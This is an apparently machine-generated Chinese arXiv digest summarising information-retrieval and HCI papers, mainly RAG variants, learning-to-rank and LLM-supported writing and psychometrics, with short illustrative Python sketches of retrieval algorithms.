Abstract:Retrieval-Augmented Generation (RAG) systems for financial document question answering typically follow a chunk-based paradigm: documents are split into fragments, embedded into vector space, and retrieved via similarity search. While effective in general settings, this approach suffers from cross-document chunk confusion in structurally homogeneous corpora such as regulatory filings. Semantic File Routing (SFR), which uses LLM structured output to route queries to whole documents, reduces catastrophic failures but sacrifices the precision of targeted chunk retrieval. We identify this robustness-precision trade-off through controlled evaluation on the FinDER benchmark (1,500 queries across five groups): SFR achieves higher average scores (6.45 vs. 6.02) and fewer failures (10.3% vs. 22.5%), while chunk-based retrieval (CBR) yields more perfect answers (13.8% vs. 8.5%). To resolve this trade-off, we propose Hybrid Document-Routed Retrieval (HDRR), a two-stage architecture that uses SFR as a document filter followed by chunk-based retrieval scoped to the identified document(s). HDRR eliminates cross-document confusion while preserving targeted chunk precision. Experimental results demonstrate that HDRR achieves the best performance on every metric: an average score of 7.54 (25.2% above CBR, 16.9% above SFR), a failure rate of only 6.4%, a correctness rate of 67.7% (+18.7 pp over CBR), and a perfect-answer rate of 20.1% (+6.3 pp over CBR, +11.6 pp over SFR). HDRR resolves the trade-off by simultaneously achieving the lowest failure rate and the highest precision across all five experimental groups.
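上述 HDRR 的两阶段流程可以用如下草图表示(纯示意:论文第一阶段 SFR 依赖 LLM 结构化输出做文档路由,第二阶段在路由结果内做向量检索,此处均用关键词重合度代替;语料结构、函数名与示例数据均为假设):

```python
def route_to_documents(query, corpus):
    """第一阶段(对应 SFR):把查询路由到最相关的文档。
    此处用查询词与文档标题的重合度做示意,论文中为 LLM 结构化输出。"""
    q = set(query.lower().split())
    scored = [(len(q & set(d["title"].lower().split())), d["id"]) for d in corpus]
    best = max(scored)[0]
    return [doc_id for score, doc_id in scored if score == best and score > 0]

def retrieve_chunks(query, corpus, doc_ids, top_k=3):
    """第二阶段(对应 CBR):只在路由到的文档范围内做片段检索。
    此处同样用词重合度代替嵌入相似度。"""
    q = set(query.lower().split())
    chunks = [c for d in corpus if d["id"] in doc_ids for c in d["chunks"]]
    chunks.sort(key=lambda c: len(q & set(c.lower().split())), reverse=True)
    return chunks[:top_k]

corpus = [
    {"id": "10-K-2023", "title": "acme 2023 annual report",
     "chunks": ["acme revenue grew 12 percent in 2023",
                "risk factors include supply chain disruption"]},
    {"id": "10-K-2022", "title": "acme 2022 annual report",
     "chunks": ["acme revenue grew 8 percent in 2022"]},
]
docs = route_to_documents("acme 2023 revenue", corpus)
top = retrieve_chunks("acme 2023 revenue", corpus, docs)
```

关键点在于第二阶段的相似度搜索被限定在第一阶段选中的文档内,结构同质的其他年份文件不会进入候选集,从而消除跨文档片段混淆。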
[IR-12] GroupRAG: Cognitively Inspired Group-Aware Retrieval and Reasoning via Knowledge-Driven Problem Structuring
【速读】:该论文旨在解决语言模型在实际应用中因知识不足和推理能力受限而导致性能下降的问题。现有方法如检索增强生成(Retrieval-Augmented Generation, RAG)和思维链(Chain-of-Thought, CoT)虽能部分缓解上述问题,但在真实场景下表现不稳定。其关键局限在于缺乏对问题结构的充分认知,即未能有效利用问题内部的潜在组织模式进行多视角推理。为此,作者提出GroupRAG框架,其核心创新在于基于知识驱动的关键点分组机制,识别问题中的隐式结构簇,并从多个概念起点并行执行检索与推理,从而实现两者之间的细粒度交互。实验表明,GroupRAG在MedQA数据集上显著优于主流RAG和CoT基线方法,验证了借鉴人类认知中问题空间搜索机制、显式建模问题结构是提升鲁棒性检索增强推理的有效路径。
链接: https://arxiv.org/abs/2603.26807
作者: Xinyi Duan,Yuanrong Tang,Jiangtao Gong
机构: Tsinghua University (清华大学)
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: 9 pages, 3 figures
Abstract:The performance of language models is commonly limited by insufficient knowledge and constrained reasoning. Prior approaches such as Retrieval-Augmented Generation (RAG) and Chain-of-Thought (CoT) address these issues by incorporating external knowledge or enforcing linear reasoning chains, but often degrade in real-world settings. Inspired by cognitive science, which characterizes human problem solving as search over structured problem spaces rather than single inference chains, we argue that inadequate awareness of problem structure is a key overlooked limitation. We propose GroupRAG, a cognitively inspired, group-aware retrieval and reasoning framework based on knowledge-driven keypoint grouping. GroupRAG identifies latent structural groups within a problem and performs retrieval and reasoning from multiple conceptual starting points, enabling fine-grained interaction between the two processes. Experiments on MedQA show that GroupRAG outperforms representative RAG- and CoT-based baselines. These results suggest that explicitly modeling problem structure, as inspired by human cognition, is a promising direction for robust retrieval-augmented reasoning.
[IR-13] EVNextTrade: Learning-to-Rank-Based Recommendation of Next Charging Nodes for EV-EV Energy Trading
【速读】:该论文旨在解决电动汽车(Electric Vehicles, EVs)在行程场景中如何识别更合适的充电节点以支持车对车(peer-to-peer, P2P)能量交易的问题,这一问题在现有研究中尚未得到充分探讨。解决方案的关键在于将充电节点推荐建模为一个学习排序(learning-to-rank)问题,并构建一个基于监督学习的排序框架,该框架利用大规模城市EV出行数据集(包含数百万条行程记录)和多维交易相关特征(如电量水平、交易角色、距离、充电速度及站点时间热度等)进行训练。为应对能源提供方与消费者移动性带来的不确定性以及决策点存在多个可行充电节点的情况,作者引入概率相关性精化机制生成分级标签,从而提升模型对排序质量的捕捉能力。实验表明,LightGBM在NDCG@k、Recall@k和MRR等指标上表现最优,尤其在早期排名精度方面突出,验证了该不确定性感知的学习排序方法在提升去中心化EV-EV能量交易系统匹配效率方面的有效性。
链接: https://arxiv.org/abs/2603.26688
作者: Md Mahfujur Rahmana,Alistair Barros,Raja Jurdak,Darshika Koggalahewa
机构: Queensland University of Technology (昆士兰科技大学)
类目: Information Retrieval (cs.IR); Machine Learning (cs.LG)
备注:
Abstract:Peer-to-peer energy trading among electric vehicles (EVs) has been increasingly studied as a promising solution for improving supply-side resilience under growing charging demand and constrained charging infrastructure. While prior studies on EV-EV energy trading and related EV research have largely focused on transaction management or isolated mobility prediction tasks, the problem of identifying which charging nodes are more suitable for EV-EV trading in journey contexts remains open. We address this gap by formulating next charging nodes recommendation as a learning-to-rank problem, where each EV decision event is associated with a set of candidate charging locations. We propose a supervised ranking framework applied to a large-scale urban EV mobility dataset comprising millions of journey records and multidimensional EV trading-related features, including EV energy level, trading role, distance to charging locations, charging speed, and temporal station popularity. To account for uncertainty arising from the mobility of both energy providers and consumers, as well as the presence of multiple viable charging nodes at a decision point, we employ probabilistic relevance refinement to generate graded labels for ranking. We evaluate gradient-boosted learning-to-rank models, including LightGBM, XGBoost, and CatBoost, on EV journey records enriched with candidate charging nodes. Experimental results show that LightGBM consistently achieves the strongest ranking performance across standard metrics, including NDCG@k, Recall@k, and MRR, with particularly strong early-ranking quality, reflected in the highest NDCG@1 (0.9795) and MRR (0.9990). These results highlight the effectiveness of uncertainty-aware learning-to-rank for charging node recommendation and support improved coordination and matching in decentralized EV-EV energy trading systems.
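文中报告的 NDCG@k 与 MRR 是排序学习的标准评估指标,可按其通用定义直接计算(以下为通用实现,并非论文代码):

```python
import math

def ndcg_at_k(relevances, k):
    """NDCG@k:relevances 为模型排序(最优在前)下各候选的分级相关性标签,
    理想排序即标签降序;折损因子为 log2(rank + 1)。"""
    def dcg(rels):
        return sum(r / math.log2(i + 2) for i, r in enumerate(rels[:k]))
    ideal = dcg(sorted(relevances, reverse=True))
    return dcg(relevances) / ideal if ideal > 0 else 0.0

def mrr(rankings):
    """MRR:rankings 中每个查询是一个按模型排序的 0/1 相关性列表,
    取首个相关项倒数排名的平均值。"""
    total = 0.0
    for rels in rankings:
        for i, r in enumerate(rels, start=1):
            if r:
                total += 1.0 / i
                break
    return total / len(rankings)
```

论文中 NDCG@1 高达 0.9795、MRR 达 0.9990,说明绝大多数决策事件里排名第一的充电节点就是高相关候选。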
[IR-14] LITTA: Late-Interaction and Test-Time Alignment for Visually-Grounded Multimodal Retrieval
【速读】:该论文旨在解决从视觉信息丰富的文档(如教科书、技术报告和手册)中检索相关证据页面的挑战,这些问题通常由长上下文、复杂布局以及用户查询与支持页面之间弱词汇重叠所导致。解决方案的关键在于提出一种以查询扩展为核心的检索框架LITTA,其在不重新训练检索器的前提下,利用大语言模型生成互补的查询变体,并通过一个冻结的视觉检索器结合晚期交互评分机制对每个变体进行候选页面检索;随后采用互斥排名融合(reciprocal rank fusion)聚合多查询结果,从而提升证据覆盖范围并降低对单一表述方式的敏感性。该方法在多个领域(计算机科学、制药和工业手册)上均显著提升了top-k准确率、召回率和平均倒数排名(MRR),尤其在视觉和语义变化较大的场景下收益明显,且可通过控制查询变体数量灵活调节精度与效率的权衡关系,具备实际部署潜力。
链接: https://arxiv.org/abs/2603.26683
作者: Seonok Kim
机构: Mazelone
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Retrieving relevant evidence from visually rich documents such as textbooks, technical reports, and manuals is challenging due to long context, complex layouts, and weak lexical overlap between user questions and supporting pages. We propose LITTA, a query-expansion-centric retrieval framework for evidence page retrieval that improves multimodal document retrieval without retriever retraining. Given a user query, LITTA generates complementary query variants using a large language model and retrieves candidate pages for each variant using a frozen vision retriever with late-interaction scoring. Candidates from expanded queries are then aggregated through reciprocal rank fusion to improve evidence coverage and reduce sensitivity to any single phrasing. This simple test-time strategy significantly improves retrieval robustness while remaining compatible with existing multimodal embedding indices. We evaluate LITTA on visually grounded document retrieval tasks across three domains: computer science, pharmaceuticals, and industrial manuals. Multi-query retrieval consistently improves top-k accuracy, recall, and MRR compared to single-query retrieval, with particularly large gains in domains with high visual and semantic variability. Moreover, the accuracy-efficiency trade-off is directly controllable by the number of query variants, making LITTA practical for deployment under latency constraints. These results demonstrate that query expansion provides a simple yet effective mechanism for improving visually grounded multimodal retrieval.
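LITTA 用于聚合多查询变体检索结果的互斥排名融合(reciprocal rank fusion, RRF)是一个标准公式:score(d) = Σᵢ 1/(k + rankᵢ(d))。最小实现如下(k=60 为文献中常用的默认平滑常数;候选页 id 为假设的示例数据):

```python
def reciprocal_rank_fusion(rankings, k=60):
    """把多个按相关性降序排列的候选列表融合为单一排序。

    rankings: 每个查询变体一个候选页 id 列表(最优在前);
    k: 平滑常数,弱化单一列表中极端排名的影响。
    """
    scores = {}
    for ranking in rankings:
        for rank, page in enumerate(ranking, start=1):
            scores[page] = scores.get(page, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

# 三个查询变体检索到部分重叠的候选页:
fused = reciprocal_rank_fusion([
    ["p3", "p1", "p7"],
    ["p1", "p3", "p9"],
    ["p1", "p7", "p2"],
])
```

在多数变体中都靠前的页面(如此例中的 p1)会被稳定推到融合结果顶部,这正是摘要所说"降低对单一表述方式的敏感性"的机制。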
[IR-15] SRAG: RAG with Structured Data Improves Vector Retrieval
【速读】:该论文旨在解决传统检索增强生成(Retrieval Augmented Generation, RAG)系统在信息检索阶段依赖纯向量相似度匹配所带来的局限性,即检索结果可能缺乏语义结构化信息,导致对复杂问题(如比较、分析和预测类问题)的回答质量受限。解决方案的关键在于提出结构化检索增强生成(Structured Retrieval Augmented Generation, SRAG),通过在查询和文档块中引入结构化元数据(如主题、情感、查询/块类型、知识图谱三元组和语义标签),显著提升向量表示的质量与语义丰富度,从而改善检索精度和答案相关性。实验表明,该方法在基于GPT-5的评估中使问答系统得分平均提升30%(p值=2e-13),尤其在复杂任务上效果突出,并展现出更广泛、多样且类似事件记忆的检索能力。
链接: https://arxiv.org/abs/2603.26670
作者: Shalin Shah,Srikanth Ryali,Ramasubbu Venkatesh
机构: Anvai AI
类目: Information Retrieval (cs.IR); Computation and Language (cs.CL)
备注:
Abstract:Retrieval Augmented Generation (RAG) provides the necessary informational grounding to LLMs in the form of chunks retrieved from a vector database or through web search. RAG could also use knowledge graph triples as a means of providing factual information to an LLM. However, the retrieval is only based on representational similarity between a question and the contents. The performance of RAG depends on the numeric vector representations of the query and the chunks. To improve these representations, we propose Structured RAG (SRAG), which adds structured information to a query as well as the chunks in the form of topics, sentiments, query and chunk types (e.g., informational, quantitative), knowledge graph triples and semantic tags. Experiments indicate that this method significantly improves the retrieval process. Using GPT-5 as an LLM-as-a-judge, results show that the method improves the score given to answers in a question answering system by 30% (p-value = 2e-13) (with tighter bounds). The strongest improvement is in comparative, analytical and predictive questions. The results suggest that our method enables broader, more diverse, and episodic-style retrieval. Tail risk analysis shows that SRAG attains very large gains more often, with losses remaining minor in magnitude.
[IR-16] ReCQR: Incorporating conversational query rewriting to improve Multimodal Image Retrieval
【速读】:该论文旨在解决现有图像检索模型在处理长文本和模糊用户表达时表现不佳的问题。其核心解决方案是引入对话式查询重写(Conversational Query Rewriting, CQR)任务,并构建了一个基于多轮对话历史的专用重写数据集ReCQR。关键创新在于利用大语言模型(Large Language Models, LLMs)大规模生成重写候选,结合LLM-as-Judge机制与人工审核筛选出约7000条高质量多模态对话样本,从而实现将用户最终查询转化为语义完整且简洁的版本,显著提升图像检索准确率,并为多模态系统中用户查询建模提供了新方向。
链接: https://arxiv.org/abs/2603.26669
作者: Yuan Hu,ZhiYu Cao,PeiFeng Li,QiaoMing Zhu
机构: 未知
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 4 pages,3 figures
Abstract:With the rise of multimodal learning, image retrieval plays a crucial role in connecting visual information with natural language queries. Existing image retrievers struggle with processing long texts and handling unclear user expressions. To address these issues, we introduce the conversational query rewriting (CQR) task into the image retrieval domain and construct a dedicated multi-turn dialogue query rewriting dataset. Built on full dialogue histories, CQR rewrites users’ final queries into concise, semantically complete ones that are better suited for retrieval. Specifically, we first leverage Large Language Models (LLMs) to generate rewritten candidates at scale and employ an LLM-as-Judge mechanism combined with manual review to curate approximately 7,000 high-quality multimodal dialogues, forming the ReCQR dataset. Then we benchmark several SOTA multimodal models on the ReCQR dataset to assess their performance on image retrieval. Experimental results demonstrate that CQR not only significantly enhances the accuracy of traditional image retrieval models, but also provides new directions and insights for modeling user queries in multimodal systems.
[IR-17] Bridge-RAG: An Abstract Bridge Tree Based Retrieval Augmented Generation Algorithm With Cuckoo Filter
【速读】:该论文旨在解决检索增强生成(Retrieval-Augmented Generation, RAG)框架中面临的两个核心问题:检索准确性和计算效率。针对准确性不足的问题,提出引入“抽象”(abstract)作为查询实体与文档片段之间的语义桥梁,并构建树状结构组织抽象信息,设计多级检索策略以确保上下文信息的充分覆盖;为提升效率,创新性地采用改进的布谷鸟过滤器(improved Cuckoo Filter)加速实体定位,并结合块链表结构与基于实体温度的排序机制,优化空间和时间局部性。实验表明,所提Bridge-RAG框架在准确率上提升约15.65%,同时将检索耗时降低10倍至500倍。
链接: https://arxiv.org/abs/2603.26668
作者: Zihang Li,Wenjun Liu,Yikun Zong,Jiawen Tao,Siying Dai,Songcheng Ren,Zirui Liu,Yanbing Jiang,Tong Yang
机构: Peking University (北京大学)
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注:
Abstract:As an important paradigm for enhancing the generation quality of Large Language Models (LLMs), retrieval-augmented generation (RAG) faces the two challenges regarding retrieval accuracy and computational efficiency. This paper presents a novel RAG framework called Bridge-RAG. To overcome the accuracy challenge, we introduce the concept of abstract to bridge query entities and document chunks, providing robust semantic understanding. We organize the abstracts into a tree structure and design a multi-level retrieval strategy to ensure the inclusion of sufficient contextual information. To overcome the efficiency challenge, we introduce the improved Cuckoo Filter, an efficient data structure supporting rapid membership queries and updates, to accelerate entity location during the retrieval process. We design a block linked list structure and an entity temperature-based sorting mechanism to improve efficiency from the aspects of spatial and temporal locality. Extensive experiments show that Bridge-RAG achieves around 15.65% accuracy improvement and reduces 10x to 500x retrieval time compared to other RAG frameworks.
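论文采用改进的布谷鸟过滤器加速实体定位。下面给出标准布谷鸟过滤器的最小示意实现,便于理解其"快速成员查询"的原理(未包含论文的块链表与实体温度排序等改进;桶数需为 2 的幂,以保证 XOR 互换索引落在合法范围内):

```python
import hashlib
import random

class CuckooFilter:
    """标准布谷鸟过滤器的最小示意实现:每个元素只存一个短指纹,
    可放入两个候选桶之一;插入冲突时驱逐已有指纹到其备用桶,
    最多重试 max_kicks 次。num_buckets 必须为 2 的幂。"""

    def __init__(self, num_buckets=128, bucket_size=4, max_kicks=100):
        self.num_buckets = num_buckets
        self.bucket_size = bucket_size
        self.max_kicks = max_kicks
        self.buckets = [[] for _ in range(num_buckets)]

    def _hash(self, data):
        return int.from_bytes(hashlib.sha256(data).digest()[:8], "big")

    def _fingerprint(self, item):
        return self._hash(b"fp:" + item.encode()) % 255 + 1  # 非零单字节指纹

    def _index(self, item):
        return self._hash(item.encode()) % self.num_buckets

    def _alt_index(self, index, fp):
        # partial-key cuckoo hashing:仅凭指纹即可在两个候选桶之间互推
        return index ^ (self._hash(bytes([fp])) % self.num_buckets)

    def insert(self, item):
        fp = self._fingerprint(item)
        i1 = self._index(item)
        i2 = self._alt_index(i1, fp)
        for i in (i1, i2):
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        i = random.choice((i1, i2))
        for _ in range(self.max_kicks):   # 驱逐一个受害者并为其重新安置
            j = random.randrange(len(self.buckets[i]))
            fp, self.buckets[i][j] = self.buckets[i][j], fp
            i = self._alt_index(i, fp)
            if len(self.buckets[i]) < self.bucket_size:
                self.buckets[i].append(fp)
                return True
        return False  # 过滤器过满,插入失败

    def contains(self, item):
        fp = self._fingerprint(item)
        i1 = self._index(item)
        return fp in self.buckets[i1] or fp in self.buckets[self._alt_index(i1, fp)]
```

查询只需探查两个桶,时间复杂度为 O(1),且支持删除(标准版本按指纹移除即可),这是它相对布隆过滤器更适合检索中实体定位的原因。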
[IR-18] M-RAG: Making RAG Faster, Stronger, and More Efficient
【速读】:该论文旨在解决传统检索增强生成(Retrieval-Augmented Generation, RAG)系统因依赖文本分块(text chunking)构建检索单元而引发的信息碎片化、检索噪声和效率低下等问题,同时回应近期研究对RAG必要性的质疑——即长上下文大语言模型(LLM)是否足以替代多阶段检索流程。其解决方案的关键在于提出一种无分块(chunk-free)的检索策略M-RAG,通过提取结构化的k-v分解元标记(meta-markers),将轻量级意图对齐的检索键(retrieval key)与富含上下文的信息值(information value)分离,从而实现高效且稳定的查询-键相似性匹配,同时不牺牲生成能力。实验表明,M-RAG在不同token预算下均优于基于分块的RAG基线,尤其在低资源场景下表现更优,验证了检索表示与生成解耦的有效性。
链接: https://arxiv.org/abs/2603.26667
作者: Sun Xu,Tongkai Xu,Baiheng Xie,Li Huang,Qiang Gao,Kunpeng Zhang
机构: Southwestern University of Finance and Economics, Chengdu, China; Zhida AI, Zhida Technology, Chengdu, China; University of Maryland, College Park, USA
类目: Information Retrieval (cs.IR); Artificial Intelligence (cs.AI)
备注:
Abstract:Retrieval-Augmented Generation (RAG) has become a widely adopted paradigm for enhancing the reliability of large language models (LLMs). However, RAG systems are sensitive to retrieval strategies that rely on text chunking to construct retrieval units, which often introduce information fragmentation, retrieval noise, and reduced efficiency. Recent work has even questioned the necessity of RAG, arguing that long-context LLMs may eliminate multi-stage retrieval pipelines by directly processing full documents. Nevertheless, expanded context capacity alone does not resolve the challenges of relevance filtering, evidence prioritization, and isolating answer-bearing information. To this end, we proposed M-RAG, a novel Chunk-free retrieval strategy. Instead of retrieving coarse-grained textual chunks, M-RAG extracts structured, k-v decomposition meta-markers, with a lightweight, intent-aligned retrieval key for retrieval and a context-rich information value for generation. Under this setting, M-RAG enables efficient and stable query-key similarity matching without sacrificing expressive ability. Experimental results on the LongBench subtasks demonstrate that M-RAG outperforms chunk-based RAG baselines across varying token budgets, particularly under low-resource settings. Extensive analysis further reveals that M-RAG retrieves more answer-friendly evidence with high efficiency, validating the effectiveness of decoupling retrieval representation from generation and highlighting the proposed strategy as a scalable and robust alternative to existing chunk-based methods.
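M-RAG 的 k-v 分解可以理解为:用轻量的、意图对齐的检索键(key)做查询匹配,命中后把上下文更丰富的信息值(value)交给生成器。以下为示意草图(用词袋余弦相似度代替论文中的向量嵌入相似度;数据、字段名与函数名均为假设,并非论文实现):

```python
import math
from collections import Counter

def cosine(a, b):
    """词袋余弦相似度(示意,代替嵌入相似度)。"""
    va, vb = Counter(a.lower().split()), Counter(b.lower().split())
    dot = sum(va[w] * vb[w] for w in va)
    na = math.sqrt(sum(v * v for v in va.values()))
    nb = math.sqrt(sum(v * v for v in vb.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve_values(query, markers, top_k=1):
    """检索时只与轻量的 key 比对,返回供生成用的 value。"""
    ranked = sorted(markers, key=lambda m: cosine(query, m["key"]), reverse=True)
    return [m["value"] for m in ranked[:top_k]]

markers = [
    {"key": "company founding year", "value": "Acme was founded in 1987 by ..."},
    {"key": "quarterly revenue figures", "value": "Q3 revenue reached ..."},
]
answer_context = retrieve_values("when was the company founded", markers)
```

检索表示(key)与生成内容(value)解耦后,匹配对象短而聚焦,不再受分块边界切断上下文的影响,对应摘要中"decoupling retrieval representation from generation"的设计。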
[IR-19] Autonomous Agent-Orchestrated Digital Twins (AADT): Leveraging the OpenClaw Framework for State Synchronization in Rare Genetic Disorders
【速读】:该论文旨在解决医学数字孪生(Medical Digital Twins, MDTs)在实际应用中普遍存在的静态或被动更新问题,导致其与患者动态变化的表型、基因组解读及临床指南之间存在显著同步延迟,尤其在罕见遗传病场景下更为突出。解决方案的关键在于提出一种自主代理协调的数字孪生框架(Autonomous Agent-orchestrated Digital Twin, AADT),通过OpenClaw的主动“心跳”机制和模块化代理技能(Agent Skills),实现对本地与外部数据流(如患者报告的表型变化、变异分类数据库更新)的持续监控,并自动执行数据摄入、标准化、状态更新及触发式分析等流程,从而确保MDT状态能够实时同步于患者的纵向表型演变和不断演进的基因组知识,提升罕见病早期诊断准确性和疾病进展建模能力。
链接: https://arxiv.org/abs/2603.27104
作者: Hongzhuo Chen,Zhanliang Wang,Quan M. Nguyen,Gongbo Zhang,Chunhua Weng,Kai Wang
机构: 未知
类目: Quantitative Methods (q-bio.QM); Artificial Intelligence (cs.AI); Information Retrieval (cs.IR)
备注:
Abstract:Background: Medical Digital Twins (MDTs) are computational representations of individual patients that integrate clinical, genomic, and physiological data to support diagnosis, treatment planning, and outcome prediction. However, most MDTs remain static or passively updated, creating a critical synchronization gap, especially in rare genetic disorders where phenotypes, genomic interpretations, and care guidelines evolve over time. Methods: We propose an agent-orchestrated digital twin framework using OpenClaw’s proactive “heartbeat” mechanism and modular Agent Skills. This Autonomous Agent-orchestrated Digital Twin (AADT) system continuously monitors local and external data streams (e.g., patient-reported phenotypes and updates in variant classification databases) and executes automated workflows for data ingestion, normalization, state updates, and trigger-based analysis. Results: A prototype implementation demonstrates that agent orchestration can continuously synchronize MDT states with both longitudinal phenotype updates and evolving genomic knowledge. In rare disease settings, this enables earlier diagnosis and more accurate modeling of disease progression. We present two case studies, including variant reinterpretation and longitudinal phenotype tracking, highlighting how AADTs support timely, auditable updates for both research and clinical care. Conclusion: The AADT framework addresses the key bottleneck of real-time synchronization in MDTs, enabling scalable and continuously updated patient models. We also discuss data security considerations and mitigation strategies through human-in-the-loop system design. 
人机交互
[HC-0] The Ultimate Tutorial for AI-driven Scale Development in Generative Psychometrics: Releasing AIGENIE from its Bottle
【速读】:该论文旨在解决心理量表开发过程中传统方法依赖大量专家参与、迭代修订及大规模预测试的问题,从而显著延长开发周期。其解决方案的关键在于提出并实现了一个名为AI-GENIE(Automatic Item Generation with Network-Integrated Evaluation)的框架,该框架将大语言模型(Large Language Model, LLM)文本生成能力与网络心理测量方法相结合,通过自动化流程生成候选题项池,并利用多步降维管道(包括探索性图分析Exploratory Graph Analysis, EGA;唯一变量分析Unique Variable Analysis, UVA;以及Bootstrap EGA)在计算机内部完成结构验证,最终输出结构有效的题项池,极大提升了心理量表早期开发阶段的效率和可扩展性。
链接: https://arxiv.org/abs/2603.28643
作者: Lara Russell-Lasalandra,Hudson Golino,Luis Eduardo Garrido,Alexander P. Christensen
机构: University of Virginia (弗吉尼亚大学); Pontificia Universidad Madre y Maestra (母与教师宗座大学); Vanderbilt University (范德比尔特大学)
类目: Artificial Intelligence (cs.AI); Computation and Language (cs.CL); Human-Computer Interaction (cs.HC)
备注: 38 pages, 8 Figures, 3 tables
Abstract:Psychological scale development has traditionally required extensive expert involvement, iterative revision, and large-scale pilot testing before psychometric evaluation can begin. The AIGENIE R package implements the AI-GENIE framework (Automatic Item Generation with Network-Integrated Evaluation), which integrates large language model (LLM) text generation with network psychometric methods to automate the early stages of this process. The package generates candidate item pools using LLMs, transforms them into high-dimensional embeddings, and applies a multi-step reduction pipeline – Exploratory Graph Analysis (EGA), Unique Variable Analysis (UVA), and bootstrap EGA – to produce structurally validated item pools entirely in silico. This tutorial introduces the package across six parts: installation and setup, understanding Application Programming Interfaces (APIs), text generation, item generation, the AIGENIE function, and the GENIE function. Two running examples illustrate the package’s use: the Big Five personality model (a well-established construct) and AI Anxiety (an emerging construct). The package supports multiple LLM providers (OpenAI, Anthropic, Groq, HuggingFace, and local models), offers a fully offline mode with no external API calls, and provides the GENIE() function for researchers who wish to apply the psychometric reduction pipeline to existing item pools regardless of their origin. The AIGENIE package is freely available on R-universe at this https URL.
[HC-1] One stout to rule them all: Reconciling artificial intelligence, data science and malted alcoholic beverages
【速读】:该论文旨在解决手工啤酒(craft beer)消费趋势与消费者偏好之间信息不对称的问题,即啤酒生产者难以准确把握消费者对多样且复杂的风味特征的偏好,从而导致市场响应滞后。其解决方案的关键在于提出一种名为分布式饮料分析(Distributed Beverage Analysis, DBA)的协作式数据收集与分析框架,通过实证验证该框架能够识别共性趋势并提供数据支持,进而提升对消费者需求的理解能力。研究进一步评估了多种大型语言模型(Large Language Models, LLMs)在该框架下的表现,证实当前多数AI模型无法可靠地推理手工啤酒领域不断演变的趋势与模式。
链接: https://arxiv.org/abs/2603.28607
作者: Dmitrii Usynin,Elena Shmakova,Michael Rheinberger
机构: 未知
类目: Human-Computer Interaction (cs.HC)
备注:
Abstract:Beer is a phenomenal beverage. It has previously shaped the history of many peoples, states and cultures. The beauty of beer is its versatility. Starting from the original implementations that were murky or diluted, over time researchers found novel approaches to gradually develop beverages that are diverse, intense and pleasant for the end user. Recently, the industry came up with the so-called craft beers, which often differ from commercial beers in production volume (due to the lower capacities of craft beer producers) and tasting profile (often having more intense, unusual flavours). However, while it is often relatively easy to judge if a particular commercial beer is likely to be enjoyable, the same cannot be said about craft beers, as there are far too many styles, implementations and ingredients involved in their production. This creates a gap between beverage producers and consumers due to the inability of the former to judge the preferences and consumption trends of the latter. As a response to this challenge we present a novel collaborative beverage-related data collection and analysis framework - the Distributed Beverage Analysis (DBA). The idea behind this study is to identify common trends and support them with empirical evidence to better understand the needs of consumers. We empirically verify DBA at the biannual Kraft Bier Fest conducted by the Vienna Kraft brewery in (you guessed it) Vienna. To showcase the need for this kind of analysis, we evaluate various large language models (LLMs) against our collaborative framework and confirm that many AI models cannot be reliably used to reason over the trends and patterns in the evolving world of craft beer.
[HC-2] Moving Beyond Review: Applying Language Models to Planning and Translation in Reflection
【速读】:该论文旨在解决学生在反思性写作(reflective writing)中难以进行深度反思、从而限制学习效果提升的问题。现有研究虽表明大语言模型(LLMs)可改善写作技能,但其应用多集中于对已完成文本的反馈,缺乏对写作规划与组织阶段的支持。论文提出的关键解决方案是基于写作认知过程理论(Cognitive Process Theory of writing, CPT),首次将LLMs应用于反思性写作的规划(planning)和翻译(translation)两个关键阶段:设计了名为Pensée的工具,通过对话式代理引导结构化反思规划,并自动提取核心概念辅助表达转化。实验结果表明,在规划与翻译阶段引入显式AI支持能显著提升反思深度和结构质量,验证了以理论为驱动的LLM干预策略的有效性。
链接: https://arxiv.org/abs/2603.28596
作者: Seyed Parsa Neshaei,Richard Lee Davis,Tanja Käser
机构: 未知
类目: Human-Computer Interaction (cs.HC); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
备注: Accepted at AIED 2026
Abstract:Reflective writing is known to support the development of students’ metacognitive skills, yet learners often struggle to engage in deep reflection, limiting learning gains. Although large language models (LLMs) have been shown to improve writing skills, their use as conversational agents for reflective writing has produced mixed results and has largely focused on providing feedback on reflective texts, rather than support during planning and organizing. In this paper, inspired by the Cognitive Process Theory of writing (CPT), we propose the first application of LLMs to the planning and translation steps of reflective writing. We introduce Pensée, a tool to explore the effects of explicit AI support during these stages by scaffolding structured reflection planning using a conversational agent, and supporting translation by automatically extracting key concepts. We evaluate Pensée in a controlled between-subjects experiment (N=93), manipulating AI support across writing phases. Results show significantly greater reflection depth and structural quality when learners receive support during planning and translation stages of CPT, though these effects reduce in a delayed post-test. Analyses of learner behavior and perceptions further illustrate how CPT-aligned conversational support shapes reflection processes and learner experience, contributing empirical evidence for theory-driven uses of LLMs in AI-supported reflective writing.
[HC-3] Multimodal Analytics of Cybersecurity Crisis Preparation Exercises: What Predicts Success?
【速读】:该论文旨在解决教学一致性(instructional alignment)在大规模情境下难以操作化的问题,即如何量化“预期认知”与“实际教学活动”之间的匹配程度,并将其用于预测学生在网络安全模拟训练中的表现。其解决方案的关键在于:首先,通过Bloom分类法对任务目标和团队邮件进行编码,定义“教学一致性”为所需认知层次与实际执行层次之间的差异;其次,利用多模态数据(文本嵌入和日志特征)构建预测模型,发现这些特征比仅基于Bloom层级的模型具有显著更高的预测能力(AUC达0.80),且教学一致性本身提供了可解释的诊断性洞察,从而实现了对模拟训练效果的有效评估与优化。
链接: https://arxiv.org/abs/2603.28553
作者: Conrad Borchers,Valdemar Švábenský,Sandesh K. Kafle,Kevin K. Tang,Jan Vykopal
机构: University of South Bohemia in České Budějovice (南波希米亚大学); Masaryk University (马萨里克大学)
类目: Human-Computer Interaction (cs.HC); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: Accepted as full paper to the 27th International Conference on Artificial Intelligence in Education (AIED 2026)
